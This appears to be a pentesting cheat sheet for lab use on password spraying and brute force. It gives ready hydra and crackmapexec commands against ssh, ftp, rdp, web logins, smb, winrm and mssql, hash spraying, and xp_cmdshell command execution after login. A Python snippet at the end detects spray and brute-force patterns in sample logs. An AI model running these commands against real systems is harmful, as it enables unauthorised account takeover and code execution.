Password Spraying

Password Attack Tips

TIP
Attempt default credentials where applicable. Remember to test default creds!

TIP
If you have a username, try variations of the username and username-related passwords against services (see 2.0-Enum Hints and Misc).

TIP
Start smart with smaller wordlists and build them up:

  1. Small custom wordlist based on the username
  2. Mangled custom wordlist
  3. Common credentials
  4. Larger common credentials
  5. rockyou.txt etc.

Default credentials

seclists/Passwords/Default-Credentials

./creds search apache out

Usernames

Suppose the user "jack" was found: use variations of the name to try and authenticate to applications.

Custom Password list

Create a file containing username variations (name2user.py, user_verbose.txt).
Create a file containing username-related passwords (user2pass.py), e.g. for "jack":

jack
Jack
admin
Admin
password
Password

Keep a set of "default"(ish) passwords (default_pass_list.txt) and test them against all services.

Manual

cat pwd.txt | rsmangler --capital --file - > mangled.txt

Bruteforce with Hydra

ssh

standard (single user + password file)

hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://$trgt1

multi target (single user + password file + target file)

hydra -l <user> -P /usr/share/wordlists/rockyou.txt -M targets.txt ssh

non standard port (user file + password file + custom port)

hydra -L users.txt -P passwords.txt -s 2222 ssh://$trgt1

web

post-based

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"

basic auth

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://192.168.219.201

TIP
Use the hydra -C option for colon-separated (user:pass) wordlists, e.g.:

admin:admin
admin:password
tomcat:s3cret
etc.

ftp

standard (single user + password file)

hydra -l itadmin -P /usr/share/wordlists/rockyou.txt ftp://192.168.219.202

multi target (single user + password file + target file)

hydra -l <user> -P /usr/share/wordlists/rockyou.txt -M targets.txt ftp

rdp

rdp spray (user file + single password)

hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
hydra -L user_list.txt -p password123! -M pub_targets.txt rdp

Brute (user file + password file + target file)

hydra -L user_list.txt -P password_list.txt -M pub_targets.txt rdp

In case the standard approach fails on rdp, loop over each user in a user list:

for u in $(cat users.txt); do hydra -l $u -P passwords.txt -M targets.txt rdp -V -t 4; done
for u in $(cat users.txt); do hydra -l $u -P passwords.txt rdp://172.16.162.12 -V -t 4; done

Password Spray with CrackMapExec

TIP
If login fails, try again without the domain or with --local-auth.

password policy

crackmapexec smb internal_target_medtech.txt -u joe -p Flowers1 --pass-pol

Spray SMB, LDAP, FTP, WINRM, RDP, MSSQL etc. as Domain user

crackmapexec smb $ip -u users.txt -p passwords.txt --continue-on-success
crackmapexec winrm $ip -u users.txt -p passwords.txt --continue-on-success
crackmapexec mssql $ip -u users.txt -p passwords.txt --continue-on-success
crackmapexec ftp $ip -u users.txt -p passwords.txt --continue-on-success
crackmapexec rdp $ip -u users.txt -p passwords.txt --rdp-timeout 30 --continue-on-success

Spray SMB, LDAP, FTP, WINRM, RDP, MSSQL etc. as Local user

crackmapexec smb $ip -u users.txt -p passwords.txt --local-auth --continue-on-success

Hash Spray

crackmapexec smb $ip -d <domain> -u users.txt -H hashes.txt
crackmapexec smb $ip -u users.txt -H hashes.txt --local-auth

On success: delete the line & rerun.

smbclient

smbclient //$trgt1 -U domain\\username%password

On success (rdp, smb, ftp, mssql, LDAP, winrm), example for mssql:

impacket-mssqlclient sql_svc:'Dolphin1'@10.10.165.148 -windows-auth
enable_xp_cmdshell
xp_cmdshell whoami
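The two patterns in these notes, spraying (user file + single password, hydra -L ... -p) and brute force (single user + password file, hydra -l ... -P), look different on the target's side: a spray touches many distinct usernames from one source, a brute force hammers one account. As an added example that is not part of these notes, this Python snippet classifies constructed sshd-style auth log lines per source IP; the log format, thresholds and sample addresses are assumptions.

```python
# Added example (not from the original notes): classify failed-login activity
# per source IP as "spray" (many distinct users, the -L users -p password
# pattern) or "bruteforce" (one user, many attempts, the -l user -P wordlist
# pattern). The whole input is treated as a single time window; a slow spray
# spread over many source IPs would need per-user correlation instead.
import re
from collections import defaultdict

# sshd auth.log format assumed; "invalid user" appears for unknown accounts.
FAILED_RE = re.compile(
    r"^\w{3} +\d+ \d\d:\d\d:\d\d \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def classify_sources(lines, user_threshold=5, attempt_threshold=10):
    """Return {ip: verdict} for every source IP with failed logins.
    spray      - failures spread over >= user_threshold distinct usernames
    bruteforce - >= attempt_threshold failures concentrated on few users
    noise      - below both thresholds (thresholds are assumed values)"""
    attempts = defaultdict(list)  # ip -> list of usernames tried
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            attempts[m["ip"]].append(m["user"])
    verdicts = {}
    for ip, users in attempts.items():
        if len(set(users)) >= user_threshold:
            verdicts[ip] = "spray"
        elif len(users) >= attempt_threshold:
            verdicts[ip] = "bruteforce"
        else:
            verdicts[ip] = "noise"
    return verdicts


# Constructed sample log: 203.0.113.5 tries one password against many users
# (spray), 198.51.100.7 hammers the single account itadmin (brute force),
# 192.0.2.9 is a lone failure.
SAMPLE_LOG = (
    [f"Mar  3 10:0{i}:00 host sshd[1{i}]: Failed password for invalid user {u} "
     f"from 203.0.113.5 port 5{i:04d} ssh2"
     for i, u in enumerate(["jack", "Jack", "admin", "itadmin", "svc", "bob"])]
    + [f"Mar  3 10:10:{i:02d} host sshd[2{i}]: Failed password for itadmin "
       f"from 198.51.100.7 port 4{i:04d} ssh2" for i in range(12)]
    + ["Mar  3 10:20:00 host sshd[99]: Failed password for alice from 192.0.2.9 port 40001 ssh2"]
)

if __name__ == "__main__":
    for ip, verdict in classify_sources(SAMPLE_LOG).items():
        print(f"{ip:15} {verdict}")
```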